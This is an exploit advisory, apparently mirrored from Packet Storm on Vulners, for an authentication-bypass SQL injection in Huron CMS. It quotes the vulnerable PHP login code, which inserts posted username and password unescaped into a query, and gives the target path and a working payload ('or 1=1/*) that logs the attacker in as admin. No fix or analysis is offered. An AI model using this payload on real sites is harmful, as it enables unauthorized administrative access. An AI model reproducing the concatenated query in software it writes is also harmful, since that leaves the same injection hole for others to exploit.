Lucene search
K

Huron CMS SQL Injection

🗓️ 01 Apr 2010 00:00:00Reported by matType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

Huron CMS 8 11 2007 SQL Injection Vulnerability in Admin Logi

Code
` \\\|///  
\\ - - //  
( @ @ )  
----oOOo--(_)-oOOo--------------------------------------------------  
Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability  
Script: http://huroncms.googlecode.com/files/Huron_28_11_2007.zip  
Author: mat  
Mail: [email protected]  
---------------Ooooo------------------------------------------------  
( )  
ooooO ) /  
( ) (_/  
\ (  
\_)  
  
//------------------------------------------------------------------+  
<?  
$consulta = "select user from Administrador where user='".$_POST['usr']."' AND password='".$_POST['pas']."'";  
$resultado=mysql_query($consulta,$link);  
$i=0;  
while($row = mysql_fetch_array($resultado))   
{  
$i++;  
}  
if($i>0){  
?>  
//------------------------------------------------------------------+  
  
http://[target]/[path]/index.php  
  
Put as username and password: 'or 1=1/*  
You will log in as admin  
  
Greetings: All Hackerz  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation